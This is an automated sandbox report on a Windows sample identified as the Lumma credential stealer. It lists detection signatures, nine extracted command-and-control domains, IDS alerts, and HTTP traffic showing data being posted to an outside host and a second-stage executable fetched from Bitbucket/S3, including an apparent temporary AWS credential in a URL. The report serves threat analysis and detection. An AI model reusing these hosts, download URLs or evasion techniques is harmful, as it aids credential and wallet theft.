Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EI3TafelpV.exe

Overview

General Information

Sample name:EI3TafelpV.exe
renamed because original name is a hash value
Original sample name:b611471d0d1a21a64700e0a8a9631761.exe
Analysis ID:1579640
MD5:b611471d0d1a21a64700e0a8a9631761
SHA1:357929ccd83d7c3045d11b80070f958b9eae40eb
SHA256:f1d21ab1bb0a7554c8958538cbc474e48e9ceccd57b7744b5c76fe7f53c5f5ac
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • EI3TafelpV.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\EI3TafelpV.exe" MD5: B611471D0D1A21A64700E0A8A9631761)
    • WerFault.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 1972 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["aspecteirs.lat", "sweepyribs.lat", "sustainskelet.lat", "energyaffai.lat", "rapeflowwj.lat", "crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "grannyejh.lat"], "Build id": "storage--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: EI3TafelpV.exe PID: 7524JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: EI3TafelpV.exe PID: 7524JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: EI3TafelpV.exe PID: 7524JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                Click to see the 2 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:19.124305+010020283713Unknown Traffic192.168.2.94970723.55.153.106443TCP
                2024-12-23T06:54:21.542638+010020283713Unknown Traffic192.168.2.949708172.67.157.254443TCP
                2024-12-23T06:54:23.537982+010020283713Unknown Traffic192.168.2.949709172.67.157.254443TCP
                2024-12-23T06:54:25.937610+010020283713Unknown Traffic192.168.2.949710172.67.157.254443TCP
                2024-12-23T06:54:28.188689+010020283713Unknown Traffic192.168.2.949711172.67.157.254443TCP
                2024-12-23T06:54:30.828440+010020283713Unknown Traffic192.168.2.949712172.67.157.254443TCP
                2024-12-23T06:54:33.747023+010020283713Unknown Traffic192.168.2.949715172.67.157.254443TCP
                2024-12-23T06:54:36.849724+010020283713Unknown Traffic192.168.2.949716172.67.157.254443TCP
                2024-12-23T06:54:42.528311+010020283713Unknown Traffic192.168.2.949717172.67.157.254443TCP
                2024-12-23T06:54:45.533242+010020283713Unknown Traffic192.168.2.949718185.166.143.49443TCP
                2024-12-23T06:54:48.047053+010020283713Unknown Traffic192.168.2.94971952.216.41.233443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:22.287398+010020546531A Network Trojan was detected192.168.2.949708172.67.157.254443TCP
                2024-12-23T06:54:24.309675+010020546531A Network Trojan was detected192.168.2.949709172.67.157.254443TCP
                2024-12-23T06:54:43.603147+010020546531A Network Trojan was detected192.168.2.949717172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:22.287398+010020498361A Network Trojan was detected192.168.2.949708172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:24.309675+010020498121A Network Trojan was detected192.168.2.949709172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:16.868933+010020583541Domain Observed Used for C2 Detected192.168.2.9549781.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:17.289699+010020583581Domain Observed Used for C2 Detected192.168.2.9603391.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:16.395708+010020583601Domain Observed Used for C2 Detected192.168.2.9602781.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:16.728179+010020583621Domain Observed Used for C2 Detected192.168.2.9569101.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:16.252298+010020583641Domain Observed Used for C2 Detected192.168.2.9591041.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:16.550467+010020583701Domain Observed Used for C2 Detected192.168.2.9597691.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:17.433895+010020583741Domain Observed Used for C2 Detected192.168.2.9568931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:17.128166+010020583761Domain Observed Used for C2 Detected192.168.2.9530561.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:16.109653+010020583781Domain Observed Used for C2 Detected192.168.2.9604101.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:26.897556+010020480941Malware Command and Control Activity Detected192.168.2.949710172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:54:19.888096+010028586661Domain Observed Used for C2 Detected192.168.2.94970723.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: EI3TafelpV.exeAvira: detected
                Found malware configuration
                Source: EI3TafelpV.exe.7524.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "sweepyribs.lat", "sustainskelet.lat", "energyaffai.lat", "rapeflowwj.lat", "crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "grannyejh.lat"], "Build id": "storage--"}
                Multi AV Scanner detection for submitted file
                Source: EI3TafelpV.exeVirustotal: Detection: 56%Perma Link
                Source: EI3TafelpV.exeReversingLabs: Detection: 50%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: EI3TafelpV.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2026322790.0000000000D81000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
                Source: EI3TafelpV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.41.233:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.9:60410 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.9:60339 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.9:59104 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.9:54978 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.9:60278 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.9:59769 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.9:56910 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.9:53056 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.9:56893 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49707 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49708 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49708 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49717 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49710 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49709 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49710 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49711 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49708 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49716 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49715 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49717 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49718 -> 185.166.143.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49719 -> 52.216.41.233:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7PRN6VEDR5TMHUPTENRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12857Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WTAXVV5OA9AVBMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15045Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=75TOG7M26NB660JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20567Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MJKDGYDQZY9N5ZTZ0JEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ENUQ248FOVKBF0B063User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587454Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNP6BZBWWT&Signature=vcA9Db7F%2B0saKRFsfCStCaveVdY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAYaCXVzLWVhc3QtMSJHMEUCIQCR4zjwVAhVqKomy%2BKxyUZYrmdqdKwZ6SsKfAW5d9SKUQIgXce6zK97xEEyq54wcwdZnPDNZDmI%2F5mX%2B12hjDMGLToqsAIIz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDOcy1jWxvqjqCRBcuCqEAniwBDIrFA%2Fv%2FG83B1FHOyiHEnF1y48cIuoA9KW45XELCyvsFTb4VkYSEUH3IdOO4bS5fbCJ5y4s3m%2Fnmg%2BMyS0bfImHj1%2BT96dKNR7zRAO9QA871R%2FzJwYCHOrnUDk2aF6sv%2FuWIGGZ1rElGUbk%2BmdrRqUBL4VypGipLQYbyLB41LkzpLnSx%2BMzhwE9VbCBQS8uQYc7yspfAdwmtAc03Oc6%2Bn0LFfNUu9tkLKdjIk2ZiptDU2BCCQXlWiMfZz%2FvM1JkbN%2B5A55S5idiJJ7lzqXylnunFWOILzTVU9Yt18pj5JITECQeXxTp%2BPxKEPZIpkM%2FxifbjKiAf375QBv%2FgVvnzYGOMNPzo7sGOp0BhvI4L7avQOxHafpF4cjsKb3nbuLVWJp1SetsJe1LVyBEusl0zRvWVAsiamizVwNj5rcNUL5WWRxoEaDu9Vzi5V0D%2F%2FulTomGSbCMYhTjpRq8pWAmW%2FCE3QT2%2BiBEYp3NgM4hKgwAC4ysgPsQreGoyCHFwzLfEM5vWVZFPsESCn1lxwjkqZKjthmB6%2F%2F1sAg%2B2fyik7GryZIaRQqTOQ%3D%3D&Expires=1734934747 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNP6BZBWWT&Signature=vcA9Db7F%2B0saKRFsfCStCaveVdY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAYaCXVzLWVhc3QtMSJHMEUCIQCR4zjwVAhVqKomy%2BKxyUZYrmdqdKwZ6SsKfAW5d9SKUQIgXce6zK97xEEyq54wcwdZnPDNZDmI%2F5mX%2B12hjDMGLToqsAIIz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDOcy1jWxvqjqCRBcuCqEAniwBDIrFA%2Fv%2FG83B1FHOyiHEnF1y48cIuoA9KW45XELCyvsFTb4VkYSEUH3IdOO4bS5fbCJ5y4s3m%2Fnmg%2BMyS0bfImHj1%2BT96dKNR7zRAO9QA871R%2FzJwYCHOrnUDk2aF6sv%2FuWIGGZ1rElGUbk%2BmdrRqUBL4VypGipLQYbyLB41LkzpLnSx%2BMzhwE9VbCBQS8uQYc7yspfAdwmtAc03Oc6%2Bn0LFfNUu9tkLKdjIk2ZiptDU2BCCQXlWiMfZz%2FvM1JkbN%2B5A55S5idiJJ7lzqXylnunFWOILzTVU9Yt18pj5JITECQeXxTp%2BPxKEPZIpkM%2FxifbjKiAf375QBv%2FgVvnzYGOMNPzo7sGOp0BhvI4L7avQOxHafpF4cjsKb3nbuLVWJp1SetsJe1LVyBEusl0zRvWVAsiamizVwNj5rcNUL5WWRxoEaDu9Vzi5V0D%2F%2FulTomGSbCMYhTjpRq8pWAmW%2FCE3QT2%2BiBEYp3NgM4hKgwAC4ysgPsQreGoyCHFwzLfEM5vWVZFPsESCn1lxwjkqZKjthmB6%2F%2F1sAg%2B2fyik7GryZIaRQqTOQ%3D%3D&Expires=1734934747 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: EI3TafelpV.exe, 00000000.00000002.2031380188.0000000005AA3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
